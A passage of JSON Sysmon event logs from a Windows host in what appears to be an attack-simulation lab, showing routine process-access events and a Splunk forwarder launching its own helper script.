C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3638,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3639,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3640,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3641,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3642,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3643,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3644,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.623\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023D-5F25-0000-00104E680500}\r\nTargetProcessId: 3108\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.623","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023D-5F25-0000-00104E680500}","TargetProcessId":"3108","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3645,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:45.734\r\nProcessGuid: {A837DB8D-023D-5F25-0000-0010256A0500}\r\nProcessId: 4848\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:45.734","ProcessGuid":"{A837DB8D-023D-5F25-0000-0010256A0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\powershell2.cmd\" 